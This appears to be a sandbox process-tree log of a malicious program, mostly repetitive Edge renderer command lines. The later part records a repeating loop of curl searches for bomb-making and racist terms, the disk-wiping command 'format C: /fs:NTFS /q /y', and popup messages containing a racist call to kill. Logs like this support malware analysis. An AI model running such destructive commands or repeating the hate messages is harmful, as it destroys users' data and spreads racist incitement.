C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5556,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:15⤵PID:5060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=5168,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3712 /prefetch:15⤵PID:3836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=5348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:15⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=3884,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5144 /prefetch:15⤵PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8060,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7752 /prefetch:15⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7828,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:15⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8392,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:15⤵PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8268,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8488 /prefetch:15⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8600,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:15⤵PID:3680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8740,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8724 /prefetch:15⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9040,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8608 /prefetch:15⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=8904,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8684 /prefetch:15⤵PID:2060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9304,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9336 /prefetch:15⤵PID:4756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9264,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9460 /prefetch:15⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=8760,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9104 /prefetch:15⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=9824,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9776 /prefetch:15⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10040,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10048 /prefetch:15⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10140,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10184 /prefetch:15⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10340,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10364 /prefetch:15⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=10544,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10564 /prefetch:15⤵PID:6380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10812,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10700 /prefetch:15⤵PID:6756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10724,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10900 /prefetch:145⤵PID:6884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10528,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10484 /prefetch:145⤵PID:6892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10912,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:145⤵PID:6900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11072,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11092 /prefetch:15⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=9736,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10884 /prefetch:15⤵PID:6572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=11392,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11376 /prefetch:15⤵PID:7012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=11628,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11656 /prefetch:15⤵PID:6332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=11536,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11568 /prefetch:15⤵PID:6984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=11972,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=1988 /prefetch:15⤵PID:6372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=12148,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12172 /prefetch:15⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=12348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12312 /prefetch:15⤵PID:6872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=12240,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12164 /prefetch:15⤵PID:7028
-
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4084
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5988
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4564
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3508
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3824
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4240
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3836
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5344
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3904
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3672
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4260
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5112
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2824
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1540
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2156
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5204
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2100
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5060
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5108
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5488
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1856
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4584
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5228
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2028
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4844
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6056
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2740
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3236
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5360
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5060
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4440
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4232
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:2984
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3828
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1676
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4012
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1008
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3148
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2072
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4024
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4700
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1252
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4880
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3272
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5836
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5488
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5268
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5860
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4232
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:296
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3704
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4592
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2740
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4928
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4380
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4216
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1756
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4772
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3608
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1960
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5148
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4048
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5296
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2084
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1008
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5368
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5692
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2004
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3696
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3312
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5360
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4440
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1960
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2508
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5316
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4044
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1676
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1008
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3628
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4928
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2472
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5908
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4264
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4280
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2408
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2324
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3464
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:980
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1676
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6056
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1908
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:2664
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5272
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3900
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5668
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5096
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2084
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4044
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2848
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:2372
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5992
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:2028
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5100
-
-
